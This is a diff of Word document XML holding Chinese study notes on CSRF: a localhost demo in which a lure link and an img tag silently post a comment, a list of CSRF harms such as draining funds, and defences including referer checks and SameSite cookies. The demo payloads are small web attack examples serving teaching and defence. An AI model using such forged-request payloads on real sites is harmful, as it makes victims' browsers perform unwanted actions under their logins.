+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>发现评论多了一条这是来自get请求的评论</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="2171700" cy="1076325"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="33" name="图片 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="33" name="图片 20"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2171700" cy="1076325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;a href="http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论"&gt;点击这里有钱拿&lt;/a&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;img src="http://localhost:1521/ajax/addComment?postId=1&amp;content=&lt;a href=file:///E:\BaiduYunDownload\csrf.html target='_blank'&gt;点击这里有钱拿&lt;/a&gt;" /&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="2228850" cy="1019175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="35" name="图片 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="35" name="图片 22"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2228850" cy="1019175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:bidi w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>4.3 SCRF攻击危害</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·利用用户登录态；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·用户不知情；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·完成业务请求；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·盗取用户资金（转账、消费）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·冒充用户背黑锅；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·损坏网站名誉；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>案例1：CSRF蠕虫攻击</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>案例2：社交平台转发；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>案例3：消费登录用户的Q币；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:bidi w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.3 CSRF攻击防御 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="4171950" cy="2133600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="图片 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="图片 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4171950" cy="2133600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>（1）③ 能请求成功的原理</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·B网站向A网站请求；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·带A网站Cookies；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·不访问A网站前端；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·referer为B网站；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/pillarjs/cookies" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>https://github.com/pillarjs/cookies</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sameSite</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>: a boolean or string indicating whether the cookie is a "same site" cookie (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> by default). This can be set to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>'strict'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>'lax'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> (which maps to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="13"/>
+          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>'strict'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="24292E"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:shd w:val="clear" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11377,19 +12879,374 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="6A9955"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>// 登录成功，设置cookie</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
